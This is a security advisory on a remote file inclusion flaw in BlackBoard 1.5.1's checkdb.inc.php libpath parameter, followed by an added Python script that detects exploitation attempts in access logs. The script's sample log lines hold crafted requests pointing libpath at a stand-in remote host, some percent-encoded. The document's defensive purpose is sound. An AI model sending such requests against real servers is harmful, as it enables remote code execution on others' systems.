[Original text] PHP remote file inclusion vulnerability in BlackBoard 1.5.1 allows remote attackers to execute arbitrary PHP code by modifying the libpath parameter (incorrectly called "libpach") to reference a URL on a remote web server that contains _more.php, as demonstrated using checkdb.inc.php.
Yves Goergen BlackBoard Internet Newsboard System checkdb.inc.php libpath Parameter Remote File Inclusion
Remote / Network Access
Loss of Confidentiality, Loss of Integrity
Yves Goergen BlackBoard Internet Newsboard contains a flaw that may allow a malicious user to execute arbitrary commands on the server. The issue arises because "checkdb.inc.php" does not validate user-supplied input to the $libpath variable. This allows an attacker to include an arbitrary file from a remote server; the commands that file contains are executed with the same privileges as the running web server.
Upgrade to version 1.5.1h or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
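To check whether a server was targeted through the unvalidated libpath parameter described above, the access log can be scanned for requests whose libpath value decodes to a remote URL. The following Python script is an added example, not part of the original advisory or of the BlackBoard code; it assumes common/combined access log format, and the sample log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# A value that points an include at another host: scheme:// or //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568 -> %68 -> h), bounded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_libpath_inclusions(log_lines):
    """Return (client, path, libpath_value, status) for suspicious requests."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable access log entry
        client, _method, target, status = m.groups()
        url = urlsplit(target)
        # parse_qsl decodes one level of percent-encoding; fully_unquote the rest.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_unquote(value)
            if name.lower() == "libpath" and REMOTE_RE.match(value):
                hits.append((client, url.path, value, int(status)))
    return hits


# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2005:10:00:00 +0000] "GET /board/index.php HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Jan/2005:10:00:05 +0000] "GET /board/checkdb.inc.php?libpath=http://remote.example/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Jan/2005:10:00:09 +0000] "GET /board/checkdb.inc.php?libpath=hTTp%3A%2F%2Fremote.example%2F HTTP/1.0" 200 312',
    '192.0.2.10 - - [01/Jan/2005:10:01:00 +0000] "GET /board/checkdb.inc.php?libpath=lib/ HTTP/1.0" 200 88',
]

if __name__ == "__main__":
    for hit in find_libpath_inclusions(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so this check does not see parameters sent in a request body.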